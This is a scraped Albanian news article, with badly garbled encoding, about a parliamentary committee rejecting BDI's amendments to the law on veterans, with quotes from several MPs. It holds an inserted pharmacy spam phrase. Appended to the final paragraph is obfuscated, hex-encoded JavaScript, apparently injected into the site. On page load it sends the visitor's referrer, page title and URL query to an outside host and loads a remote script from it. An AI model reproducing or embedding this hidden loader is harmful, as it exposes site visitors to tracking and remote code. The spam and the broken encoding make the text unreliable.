largea_talati1352970171

Bie edhe amendamenti i katA�rt i BDI-sA� pA�r branitellat

ninth street pharmacy soma. GjashtA� vota kundA�r 2 pro, ky ishte fati i amendamentit tA� katA�rt tA� BDI-sA� nga gjithsejtA� 15 mijA� sa ka parashtruar partia e Ahmetit pA�r tA� penguar miratimin e ligjit pA�r branitellat.

VMRO dhe BDI edhe sot mbetA�n tA� betonuara nA� pozicionet tyre e para pro miratimit tA� ligjit dhe e dyta kundA�r. NdA�rkohA� qA� opozita vazhdon nA� gjithA� kA�tA� tA� sheh njA� lojA� tA� partnerA�ve tA� koalicionit qeveritarA� pA�r pA�rfitim tA� pikA�ve politike.

a�?MjaftA� mA� me kA�to lojA�ra, gjithA�ka po ju del nA� shesh, A�shtA� mirA� qA� tA� filloni tA� pA�rgatiteni tA� jepni llogari pA�r shumA� punA�, e para se pse deri tani 8 vjet nA� pushtet BDI, ende nuk e ka zgjedhur statusin e pjesA�marrA�sve shqiptarA� nA� konfliktin e 2001 dhe sot jemi sjellA� nA� situatA� qA� tA� sjellim Velen, aman prano, nuk bA�hen me lutje kA�to punA�, e bA�jmA� ose jo, nA�se jo me qeveri me krejt le tA� shkoj A�n dreq tA� mallkuara�?, tha Bekim Fazliu, deputet i PDSH-sA�

a�?A�shtA� legjitime investimi i opozitA�s shqiptare, dilni nga qeveria. Ju garantoj tA� nderuar kolegA� tA� pranishA�m dhe ju qytetarA� tA� respektuar dalja nga qeveria nuk e parandalon sjelljen e ligjit, sepse kriza qeveritare nuk nA�nkupton krizA� parlamentare. JanA� numrat, janA� procedurat, mbaron debati nA� komision shkohet nA� seancA� plenare dhe ata i kanA� votat dhe e votojnA�. A�ka se ne shkojmA� nA� zgjedhje tA� parakohshme apo tA� krijojmA� krizA� politike, kur ky ligj i dA�mshA�m mund tA� sillet. MA�nyra e vetme pA�r mos me u sjellA� A�shtA� debati nA� kA�tA� komision amA�a�?, tha Xhevat Ademi, deputet i BDI-sA�

NdA�rkohA� deputeti i RDK-sA� Izet Zeqiri, vuri nA� dukje se propozim buxheti pA�r vitin 2013 nuk parasheh mjete pA�r implementim tA� ligjit, dhe se miratimi ose mos miratimi A�shtA� njA� farsA� politike e partnerA�ve A�t koalicionit.

a�?NA� propozim buxhetin e 2013 nuk janA� paraparA� mjete financiare pA�r realizimin e kA�tij projekti..02:37KA�tA� ligj nuk do ta sjellni. KA�tA� e din edhe premieri, e dini edhe ju zoti Vele, e din edhe Suzana edhe gjithA� tA� tjerA�t se ju nuk mund tA� sjellni njA� ligj pA�r tA� cilin nuk keni parapa mjete financiare. Ju e dini se konceptimi i buxhetit A�shtA� bA� dhe A�shtA� dorA�zua nA� parlament, mbasi A�shtA� dorA�zua propozim ligjia�? , tha Izet Zeqiri, deputet i RDK-sA�

a�?Zoti Zeqiri rini tA� qetA� se ligj tA� tillA� siA� A�shtA� propozuar nuk do tA� ketA�, sepse nuk do tA� lejoj unA�, nuk do tA� lejosh ti, nuk do tA� lejoj Bekimi, nuk do tA� lejoj grupi i deputetA�ve tA� BDI-sA�, nuk do tA� lejoj grupi i deputetA�ve tA� PDSH-sA�, nuk do A�t lejojnA� deputetA�t e RDK-sA�, rrini tA� qetA� se ajo nuk do tA� ndodhA�a�?, tha Xhevat Ademi, deputet i BDI-sA�.

Po qA� se debati rreth 15 mijA� amendamenteve tA� BDI-sA� do tA� vazhdoj mA� kA�tA� tempo, pavarA�sisht kufizimeve pA�r shqyrtimin e tyre do tA� nevojiten vite tA� tA�ra.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}